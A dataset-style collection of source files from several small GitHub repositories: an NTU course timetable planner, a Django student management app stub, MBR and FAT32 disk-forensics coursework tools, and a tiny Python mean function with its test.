"content_id": "27bc9c8bead90e7d53f436f9640cc9076fc7bb68",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 227,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 6,
"path": "/ntu_course_planner/__init__.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "import requests\nfrom . import config\n\nr = requests.get(\"https://raw.githubusercontent.com/koallen/ntu-course-planner-cli/master/LATEST\")\nlatest_version = r.text.rstrip(\"\\n\")\nconfig.init(latest_version[0:4], latest_version[-1])\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.7629449963569641,
"avg_line_length": 32.4054069519043,
"blob_id": "a3cd3aefbe09db2ebe343a32c821a52099023fb5",
"content_id": "7e3891ca5bca3cfdbe8866da0a0c50b766749c01",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1236,
"license_type": "permissive",
"max_line_length": 188,
"num_lines": 37,
"path": "/README.md",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "# NTU Course Planner\n\n> A Python program for NTU students to plan courses.\n\n## Newest Course Schedule Updates\n\nUpdated for academic year 2018-19 semester 2 (*30/11/2018*)\n\n## Installation\n\nTo use this program, just install the package via `pip` by typing the following command in your terminal\n```bash\n$ pip install ntu-course-planner\n```\n\n## Usage\n\nAfter you installed the package, run the program by typing the following in your terminal\n```bash\n$ ntu-course-planner\n```\n\nYou are required to type in the number of courses you are taking and the course codes. Then the planner will plan your timetable.\n\nThe result which has all the possible combination of indexes is saved as a text file called **result.txt**. The file is inside the folder which you run the command.\n\n## Development Dependencies\n\n* requests\n* beautifulsoup4\n\nIf you know how to use *requirements.txt*, you can use that to help you install these dependencies.\n\n## Contribution\nIf you would like to contribute to this project, please contact me via the email in my profile page. Here are some improvements that I would like to implement in the future if I have time:\n- ~~Make it a Python package~~ (done)\n- Develop a front-end website as well as a back-end API for it\n"
},
{
"alpha_fraction": 0.6823529601097107,
"alphanum_fraction": 0.6823529601097107,
"avg_line_length": 20.25,
"blob_id": "46c6ebaeafff79cd4ac08efd163e5f47f0fc17fc",
"content_id": "48b77a442d1b58d34a2a3d4a451b3afde8e5c082",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 170,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 8,
"path": "/ntu_course_planner/main.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "from .planner import Planner\nfrom . import config\n\nimport requests\n\ndef main():\n print(\"Planning for \" + config.ACADYEAR + \"/\" + config.ACADSEM)\n Planner().start()\n"
},
{
"alpha_fraction": 0.5478223562240601,
"alphanum_fraction": 0.5606319308280945,
"avg_line_length": 34.7557258605957,
"blob_id": "5becf3e176a2b98d0b70ba8de643379d50897826",
"content_id": "b201546a04d48a0f331f0626607392fda207a0a7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4684,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 131,
"path": "/ntu_course_planner/course.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport ssl\n\nfrom .ssl_type import SSLAdapter\nfrom . import config\n\n\nclass Course:\n\n\n def __init__(self, courseCode):\n self.__courseCode = courseCode\n self.__courseSchedule = CourseSchedule()\n\n def get_course_schedule(self):\n \"\"\"get the dictionary of the schedule\"\"\"\n\n return self.__courseSchedule.get_schedule()\n\n def get_course_code(self):\n \"\"\"get the course code\"\"\"\n\n return self.__courseCode\n\n def fetch_schedule(self):\n \"\"\"fetch schedule of the course\"\"\"\n\n self.__courseSchedule.parse_schedule(self.__courseCode)\n\n\nclass CourseSchedule:\n \"\"\"class that contains schedule of a course\"\"\"\n\n INDEX_OF_DAY = {'MON': 0, 'TUE': 24, 'WED': 48, 'THU': 72, 'FRI': 96}\n\n def get_schedule(self):\n return self.__schedule\n\n def parse_schedule(self, courseCode):\n \"\"\"parse the course schedule and convert it to a binary string\"\"\"\n\n self.__schedule = {}\n\n # get html table format of course schedule\n print(\"Getting schedule for \" + courseCode.upper() + \"...\", end=\" \")\n schedule = self.__fetch_schedule(courseCode)\n print(\"Done\")\n\n # convert the course schedule to a binary string\n #\n # it is a 120 bit string and every bit represents half an hour\n # bit 1 means that there is a class at that time\n # bit 0 means there is none\n #\n # for each day the time is from 8:30 am to 8:30 am\n # this should be able to cover the schedule of most of the\n # courses in NTU\n for i in range(len(schedule) // 7):\n for j in range(7):\n string = str(schedule[i * 7 + j])\n string = string[7:len(string) - 9]\n if j == 0 and string != \"\": # get the index of the course\n currentIndex = string\n self.__schedule[currentIndex] = \"0\" * 120\n elif j == 3: # get the days that have this course\n indexOfDay = CourseSchedule.INDEX_OF_DAY[string]\n elif j == 4: # get the time of that course in a day\n numOfTimeSlots = self.__get_time(string)\n indexOfTime = (int(string[:4]) - 830) // 50\n # if j reaches 6, prasing is done\n # the following code is to modify the binary string\n # according to the parsing result\n elif j == 6:\n startingIndex = indexOfDay + indexOfTime\n endingIndex = startingIndex + numOfTimeSlots\n self.__schedule[currentIndex] = \\\n self.__schedule[currentIndex][:startingIndex] + \\\n \"1\" * numOfTimeSlots + \\\n self.__schedule[currentIndex][endingIndex:]\n else:\n pass\n\n def __fetch_schedule(self, courseCode):\n \"\"\"fetch course schedule using course code from NTU website\"\"\"\n\n # generate URL for the course\n url = \\\n \"https://wish.wis.ntu.edu.sg/webexe/owa/AUS_SCHEDULE\" + \\\n \".main_display1?acadsem=\" + config.ACADYEAR + \";\" + config.ACADSEM + \\\n \"&r_search_type=F&r_subj_code=\" + courseCode + \\\n \"&boption=Search&staff_access=false&acadsem=\" + config.ACADYEAR + \\\n \";\" + config.ACADSEM + \"&r_course_yr=\"\n\n # try connecting to the server\n try:\n s = requests.Session()\n s.mount(\"https://\", SSLAdapter(ssl.PROTOCOL_TLSv1))\n r = s.post(url)\n # exit program if server is not reachable\n except requests.exceptions.ConnectionError:\n print(\"Connection error. 
Cannot connect to NTU server.\")\n print(\"Please try to run this script again.\")\n exit(-1)\n\n # create BeautifulSoup object for later parsing\n soup = BeautifulSoup(r.text, features=\"html.parser\")\n\n # save the table which contains the course schedule\n try:\n schedule = soup.find_all(\"table\")[1].find_all(\"td\")\n except IndexError:\n print(\"\\nThe course code does not exist in NTU database\" +\n \"for this semester.\")\n print(\"Please make sure you entered a valid course code.\")\n exit(-1)\n schedule = schedule[:]\n\n return schedule\n\n def __get_time(self, timeString):\n \"\"\"convert the time format '0830-0930'\n to number of bits in the binary string\n \"\"\"\n\n timeInterval = int(timeString[5:]) - int(timeString[:4])\n numOfTimeSlots = timeInterval // 50\n\n return numOfTimeSlots\n"
},
{
"alpha_fraction": 0.5158549547195435,
"alphanum_fraction": 0.5226824283599854,
"avg_line_length": 29.794391632080078,
"blob_id": "8f9c03bc4b9d8813811882d622ffab00088f8517",
"content_id": "b506ce43d163de294b04f18e825d85345e124b52",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6591,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 214,
"path": "/ntu_course_planner/planner.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nPlanner that plans the timetable\n\"\"\"\n\nfrom itertools import product\nfrom .course import Course\nimport re\n\n\nclass Planner:\n \"\"\"planner handles the planning of timetable\"\"\"\n\n def plan(self, course_list, output_file=None):\n \"\"\"\n Execute the planner\n\n parameters:\n course_list: A list of courses\n output_file: The file to save the result to\n \"\"\"\n\n # course code validation\n if not self.validate(course_list):\n return {'error': 'invalid course code'}\n\n # save courses\n self.__courses = []\n for course_code in course_list:\n self.__courses.append(Course(course_code))\n\n # fetch schedule\n self.__fetch_schedule()\n\n # generate permutations and test them\n courseAndIndex = []\n for course in self.__courses:\n courseAndIndex.append(\n [i for i in range(len(course.get_course_schedule()))]\n )\n\n combinations = list(product(*courseAndIndex))\n self.__test_all_combinations(combinations)\n\n # output results\n if output_file is not None:\n pass\n\n result = []\n\n for combination in self.__result:\n single_result = []\n for i in range(len(combination)):\n single_dict = {}\n single_dict['course code'] = self.__courses[i].get_course_code().upper()\n single_dict['index'] = self.__bufferList[i][combination[i]]\n single_result.append(single_dict)\n result.append(single_result)\n\n return result\n\n\n def validate(self, course_list):\n \"\"\"\n Validates the course code\n\n parameters:\n course_list: A list of courses\n \"\"\"\n\n pattern = r\"^\\w{2}\\d{4}$\" # course code regex pattern\n\n # validate every course code\n for course in course_list:\n if not re.search(pattern, course):\n return False\n return True\n\n def start(self):\n \"\"\"start the planner\"\"\"\n\n # get courses and fetch their schedule first\n self.__get_courses()\n self.__fetch_schedule()\n\n # create a list to store all combination\n courseAndIndex = []\n for course in self.__courses:\n courseAndIndex.append(\n [i for i in range(len(course.get_course_schedule()))]\n )\n\n combinations = list(product(*courseAndIndex))\n\n # plan courses\n print(\"\\nPlanning your courses, please wait...\")\n self.__test_all_combinations(combinations)\n\n # save the result\n self.__save_result()\n\n def __get_courses(self):\n \"\"\"get the number of courses and corresponding course code(s)\"\"\"\n\n while True:\n try:\n numOfCourses = int(\n input(\"How many courses do you wanna take? 
> \")\n )\n if numOfCourses < 1:\n print(\"Please enter a number larger than 0\")\n else:\n break\n except ValueError:\n print(\"Please enter a valid number\")\n\n self.__courses = []\n\n for num in range(numOfCourses):\n courseCode = input(\"Input course code > \")\n self.__courses.append(Course(courseCode))\n print()\n\n def __fetch_schedule(self):\n \"\"\"fetch all the schedules\"\"\"\n\n for course in self.__courses:\n course.fetch_schedule()\n\n def __check_clash(self, time1, time2):\n \"\"\"simply check whether the schedules of two courses clash\"\"\"\n\n for i in range(120):\n # schedules clash when the bits at the same index is both 1\n if time1[i] == time2[i] == \"1\":\n return True\n else:\n continue\n return False\n\n def __combine_time(self, time1, time2):\n \"\"\"combine the schedules of two courses to\n form a new binary string containing schedule\n for both courses\n \"\"\"\n\n newTime = \"0\" * 120\n\n for i in range(120):\n if time1[i] == time2[i] == \"0\":\n continue\n else:\n newTime = newTime[:i] + \"1\" + newTime[i + 1:]\n\n return newTime\n\n def __test_all_combinations(self, combinations):\n \"\"\"test all possible combinations of indexs for clashing\"\"\"\n\n # create a bufferList to store every index\n # for every course in nested loops\n self.__bufferList = []\n for course in self.__courses:\n self.__bufferList.append(\n [index for index in course.get_course_schedule().keys()]\n )\n\n # make a copy of combinations to store the results\n self.__result = combinations[:]\n\n for combination in combinations:\n currentTime = \"0\" * 120\n for i in range(len(combination)):\n schedule = self.__courses[i].get_course_schedule()\n nextTime = schedule[self.__bufferList[i][combination[i]]]\n if self.__check_clash(currentTime, nextTime):\n self.__result.remove(combination)\n break\n else:\n currentTime = self.__combine_time(currentTime, nextTime)\n # if self.__meetsRequirement(currentTime):\n # continue\n # else:\n # self.result.remove(combination)\n # break\n\n def __meets_requirement(self, time):\n \"\"\"check whether a possible schedule meets my requirement\"\"\"\n\n for i in range(0, 120, 24):\n if \"1\" in time[i:i + 2]: # classes start after 9:30 am\n return False\n else:\n continue\n return True\n\n def __save_result(self):\n \"\"\"save all schedules that meet my requirement to a text file\"\"\"\n\n with open(\"result.txt\", \"w\") as finalResult:\n counter = 1\n finalResult.write(\"Possible choices(s):\\n\\n\")\n for combination in self.__result:\n finalResult.write(str(counter) + \":\\n\")\n counter += 1\n for i in range(len(combination)):\n finalResult.write(\n self.__courses[i].get_course_code().upper() +\n \": \" + self.__bufferList[i][combination[i]] +\n \"\\n\"\n )\n finalResult.write(\"\\n\")\n\n print(\"\\nResults have been saved to file 'result.txt'\")\n\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 18.600000381469727,
"blob_id": "37e859a0f1691c103a28a2f26de26cdba77b3ed8",
"content_id": "ed1bf84fd8285673a3598f12064a757b199a254f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 98,
"license_type": "permissive",
"max_line_length": 20,
"num_lines": 5,
"path": "/ntu_course_planner/config.py",
"repo_name": "koallen/ntu-course-planner-cli",
"src_encoding": "UTF-8",
"text": "def init(year, sem):\n global ACADYEAR\n global ACADSEM\n ACADYEAR = year\n ACADSEM = sem\n"
}
] | 10 |
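The planner's core trick is the 120-bit schedule string built in course.py and tested in planner.py: one bit per half-hour slot, five days of 24 slots each, so two indexes clash exactly when they share a '1' bit. A self-contained sketch of the clash test; the sample schedules below are invented for illustration:

def clashes(time1, time2):
    """Two 120-bit schedule strings clash iff any slot is '1' in both."""
    return any(a == b == "1" for a, b in zip(time1, time2))

mon_0830_1030 = "1" * 4 + "0" * 116            # Monday 8:30-10:30
mon_1030_1130 = "0" * 4 + "1" * 2 + "0" * 114  # Monday 10:30-11:30

print(clashes(mon_0830_1030, mon_1030_1130))    # False: back-to-back is fine
print(clashes(mon_0830_1030, "1" + "0" * 119))  # True: both use the 8:30 slot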
dearcharlyn/student_management_system
|
https://github.com/dearcharlyn/student_management_system
|
94f1719eaa54097dd074e7981832be7d9b1f46fa
|
608dbdbeb2cd560663d57f0ea428e13e5a952fcc
|
af5b2c20960c0ad05c9e1a18d3a2500de79ee710
|
refs/heads/master
| 2023-06-13T00:29:26.976492 | 2021-06-29T07:56:42 | 2021-06-29T07:56:42 | 380,988,678 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5471698045730591,
"alphanum_fraction": 0.7358490824699402,
"avg_line_length": 16.66666603088379,
"blob_id": "c1855bed7315d86262803f7f5c94b37c26f21a35",
"content_id": "5d402f42e8aaaabeabd11415fd998dd6ee99c6bd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "dearcharlyn/student_management_system",
"src_encoding": "UTF-8",
"text": "--find-links wheelhouse\nDjango==1.11.29\npytz==2021.1\n"
},
{
"alpha_fraction": 0.7307692170143127,
"alphanum_fraction": 0.7362637519836426,
"avg_line_length": 21.75,
"blob_id": "6c0fa530284e07fe64b092dc79904281137eb601",
"content_id": "b70e9a27224700c9e484500e446368bfac7109cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 182,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 8,
"path": "/student_management_app/apps.py",
"repo_name": "dearcharlyn/student_management_system",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.apps import AppConfig\n\n\nclass StudentManagementAppConfig(AppConfig):\n name = 'student_management_app'\n"
}
] | 2 |
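StudentManagementAppConfig above only takes effect once Django is told about it; a typical wiring in the project's settings module would look like the following illustrative fragment (not taken from the repository):

# settings.py fragment - illustrative assumption, not from the repo
INSTALLED_APPS = [
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    "student_management_app.apps.StudentManagementAppConfig",
]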
bpsizemore/DiskForensics
|
https://github.com/bpsizemore/DiskForensics
|
9818e86dabd624a2dd4f8a8dd364f20c9488b7c0
|
1b779dd86cb75493efe699d982f7e7d43ca0261d
|
f993f725012fe464368a334300fddecdeca5df21
|
refs/heads/master
| 2020-05-27T03:10:19.915641 | 2017-11-09T16:52:15 | 2017-11-09T16:52:15 | 82,516,341 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5619886517524719,
"alphanum_fraction": 0.619257390499115,
"avg_line_length": 20.472972869873047,
"blob_id": "6312641398e25a7e362d734efec8f0ca1f190374",
"content_id": "36d3a6385229eafa6c13ae4e25fc372be27d7a29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1589,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 74,
"path": "/mbr.c",
"repo_name": "bpsizemore/DiskForensics",
"src_encoding": "UTF-8",
"text": "#include <stdio.h>\n#include <stdlib.h>\n\ntypedef union {\n\tunsigned int ui;\n\tunsigned char b4;\n} Dword;\n\nvoid printPartInfo(unsigned char *part, int partNum)\n{\n\tprintf(\"Partition %d:\\n\", partNum);\n\tint i;\n\tfor (i=0; i<16; i++)\n\t{\n\t\tprintf(\"%02x\", part[i]);\n\t}\n\tprintf(\"\\n\");\n\n\tif (part[0] == 0x80){\n\t\tprintf(\"Bootable: true\\n\");\n\t} else {\n\t\tprintf(\"Bootable: false\\n\");\n\t}\n\n\t\t\n\tprintf(\"CHS value of first sector: %02x %02x %02x\\n\", part[1], part[2], part[3]);\n\tprintf(\"Partition type: %02x\\n\", part[4]);\n\tprintf(\"CHS value of last sector: %02x %02x %02x\\n\", part[5], part[6], part[7]);\n\tprintf(\"LBA of first sector: %02x %02x %02x %02x\\n\", part[8], part[9], part[10], part[11]);\n\t\n\tDword totalSectors = {part[12], part[13], part[14], part[15]};\n\tprintf(\"Total Number of Sectors: %u\\n\", totalSectors.ui);\n\tprintf(\"\\n\");\n}\n\nint main()\n{\n\tprintf(\"Partition Table:\\n\\n\");\n\tunsigned char sectorZero[512];\n\n\tFILE *image;\n\timage = fopen(\"sdb.mbr\", \"r\");\n\tfread(sectorZero, 1, 512, image);\n\n\tint x = 0;\n\tint i;\n\tunsigned char first[16];\n\tfor (i=0; i<16; i++) {\n\t\tfirst[i] = sectorZero[x+i];\n\t}\n\n\tx = 16; //beginning of second partition entry\n\tunsigned char second[16];\n\tfor (i=0; i<16; i++) {\n\t\tsecond[i] = sectorZero[x+i];\n\t}\n\n\tx = 32; //beginning of third partition entry\n\tunsigned char third[16];\n\tfor (i=0; i<16; i++) {\n\t\tthird[i] = sectorZero[x+i];\n\t}\n\n\tx = 48; //beginning of fourth partition entry\n\tunsigned char fourth[16];\n\tfor (i=0; i<16; i++) {\n\t\tfourth[i] = sectorZero[x+i];\n\t}\n\n\tprintPartInfo(first, 1);\n\tprintPartInfo(second, 2);\n\tprintPartInfo(third, 3);\n\tprintPartInfo(fourth, 4);\n}\n"
},
{
"alpha_fraction": 0.8051282167434692,
"alphanum_fraction": 0.8153846263885498,
"avg_line_length": 47.75,
"blob_id": "e3a3cb03b2ab56d0c9393265312b1772c8aa5d49",
"content_id": "c74d49030cd41d8a74c64af6bbe6d4d5a57b4680",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 195,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 4,
"path": "/README.md",
"repo_name": "bpsizemore/DiskForensics",
"src_encoding": "UTF-8",
"text": "# DiskForensics\nDisk Forensic Analysis Tools\n\nThese tools were written for a CPE class titled Digital Forensics. They can be used to extract partitions from an MBR and examine a FAT32 partition.\n"
},
{
"alpha_fraction": 0.5824840664863586,
"alphanum_fraction": 0.6337579488754272,
"avg_line_length": 28.037036895751953,
"blob_id": "e3e30f46b5bd7f385af597b53fda897b24ab4f6d",
"content_id": "83ebfc41fb4333e8ad6bbc09a99d997553116668",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3140,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 108,
"path": "/fat32.py",
"repo_name": "bpsizemore/DiskForensics",
"src_encoding": "UTF-8",
"text": "from tkinter import *\n\nroot = Tk()\nT = Text(root, height=30, width=100)\nT.pack()\n\ndef print_hex(d, s):\n print(d + ' '.join(map('{:02X}'.format, s)));\n\n\ndef print_dec(d, s):\n print(d + str(int.from_bytes(s, byteorder='little')))\n\n\ndef print_dir_entry(d, ):\n #print_hex('', d)\n if d[0] == 0x00: #If filename starts with 0x00 then then a file was never written there\n return\n\n elif d[0] == 0x05: #If file was previously deleted\n print(\"File previously deleted\")\n print()\n return\n elif d[0] == 0x41:\n #print(\"Extended filename entry\");\n #print();\n return\n\n T.insert(END, ('Filename: ' + str(d[0:8]) + '\\n'))\n #print_hex('', d)\n T.insert(END, (\"Starting cluster: \" + str(int.from_bytes(d[26:28], byteorder='little')) + '\\n'))\n T.insert(END, (\"Filesize in Bytes: \" + str(int.from_bytes(d[28:32], byteorder='little')) + '\\n'))\n\n # iterate through fat entries\n fat_cluster = int.from_bytes(d[26:28], byteorder='little')\n file_start = root_dir + (fat_cluster - 2) * 512 - 64\n print(fat_cluster)\n while fat_cluster != 0:\n contents = data[file_start:file_start+512]\n i = 0\n while i < 512 and contents[i] != 0x00:\n i = i + 1\n\n T.insert(END, 'File Contents: ' + str(contents[0:i]))\n\n fat_cluster = 0;\n T.insert(END, '\\n\\n')\n # while data[(fat_start_offset + 4 * fat_cluster + 2)] != 0xFF:\n # swap to next fat cluster num and do stuff\n # print()\n\nfat_partition = open(\"usb1.img\", \"rb\")\n\ndata = fat_partition.read()\njump_instruction = data[0:3]\noem_name = data[3:11]\nbytes_per_sector = data[11:13]\nsectors_per_cluster = data[13]\nreserved_sectors = data[14:16]\nnum_fats = data[16]\nmax_root_entries = data[17:19]\nsmall_sectors = data[19:21]\nmedia_type = data[21]\nsectors_per_fat = data[22:24]\nsectors_per_track = data[24:26]\nnum_heads = data[26:28]\nhidden_sectors = data[28:32]\nlarge_sectors = data[32:36]\ndisk_num = data[36]\ncurr_head = data[37] # not used in FAT\nex_sig = data[38]\nvolume_serial = data[39:43]\nvolume_label = data[43:54]\nsystem_id = data[54:62]\nsig = data[510:512]\nfat_start_offset = reserved_sectors * 512\n\n# found other document saying different info\n\nsectors_per_fat = data[36:40]\nroot_dir_first_cluster = data[44:48]\n\nprint_hex(\"Jump instruction: \", jump_instruction)\nprint('Oem_name: ' + str(oem_name))\nprint_dec('Bytes per sector: ', bytes_per_sector)\nprint('Sectors per cluster: ', sectors_per_cluster)\nprint_dec('Reserved sectors: ', reserved_sectors)\nprint('Number of FATs: ', num_fats)\nprint_dec('Maximum number of Root Entries: ', max_root_entries)\nprint_dec('Sectors per FAT: ', sectors_per_fat)\nprint_dec('Sectors per track: ', sectors_per_track)\nprint_dec('Hidden sectors: ', hidden_sectors)\nprint_dec('Total number of sectors: ', large_sectors)\nprint_hex('Signature: ', sig)\nprint_dec('Root Dir starts at sector: ', root_dir_first_cluster)\n\nroot_dir = (520*2 + 32)*512 + 64\nprint()\nT.insert(END, 'Directory listing follows... \\n\\n')\nprint()\nprint()\n\nx = 0;\nwhile data[root_dir+x] != 0x00:\n print_dir_entry(data[root_dir+x:root_dir+x+32])\n x = x + 32;\n\nmainloop()\n\n\n\n\n"
}
] | 3 |
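mbr.c above walks the four 16-byte partition entries field by field; the same layout (boot flag, CHS triples, type byte, little-endian LBA and sector count) unpacks in a single struct call in Python. A sketch on a fabricated entry (the byte values are my own):

import struct

# fabricated bootable FAT32 entry: boot flag 0x80, type 0x0B,
# first LBA 63, 4096 total sectors
entry = bytes([0x80, 0x01, 0x01, 0x00, 0x0B, 0xFE, 0xFF, 0xFF,
               0x3F, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00])

boot, chs_first, ptype, chs_last, lba_first, total = struct.unpack(
    "<B3sB3sII", entry)

print("bootable:", boot == 0x80)  # True
print("type: 0x%02X" % ptype)     # 0x0B (FAT32)
print("first LBA:", lba_first)    # 63
print("total sectors:", total)    # 4096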
pmpierremathis/Toolobx
|
https://github.com/pmpierremathis/Toolobx
|
d867faf97a627d1b744564e2ea4e1a4cd623617c
|
fcb41263a9f03205bb71ebc4b02812478c06b694
|
41652e11721048a34e2e4cde40c7ad30d67adc7a
|
refs/heads/master
| 2023-06-05T07:45:10.109681 | 2021-06-21T14:44:38 | 2021-06-21T14:44:38 | 378,928,689 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6551724076271057,
"alphanum_fraction": 0.6896551847457886,
"avg_line_length": 21,
"blob_id": "8152efff1c54871d28433386986d131ab4861362",
"content_id": "8c1a3fa3908494bba5043b67411e4328d664272b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 4,
"path": "/tests/test_best.py",
"repo_name": "pmpierremathis/Toolobx",
"src_encoding": "UTF-8",
"text": "from toolobx.best import mean\n\ndef test_mean():\n assert type(mean([1,2,3])) is float"
},
{
"alpha_fraction": 0.5193798542022705,
"alphanum_fraction": 0.5426356792449951,
"avg_line_length": 20.66666603088379,
"blob_id": "89fa75cc32d5068274090fb3abcc8f3db65e7dd8",
"content_id": "7efea80a653dd582e7babec395441ce7f61017bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 6,
"path": "/toolobx/best.py",
"repo_name": "pmpierremathis/Toolobx",
"src_encoding": "UTF-8",
"text": "def mean(a_list):\n return sum(a_list) / len(a_list)\n\nif __name__ == \"__main__\":\n example = [1,2,3]\n print(mean(example))"
}
] | 2 |
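test_best.py above only asserts the return type of mean(); a value-level check is usually worth adding alongside it. A sketch using pytest.approx for the float comparison, assuming pytest is installed and reusing the package's own import path:

import pytest
from toolobx.best import mean  # same import path as the existing test

def test_mean_value():
    # approx avoids brittle exact float comparisons
    assert mean([1, 2, 3]) == pytest.approx(2.0)
    assert mean([2, 2]) == pytest.approx(2.0)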
The top public SQL queries from the community will appear here once available.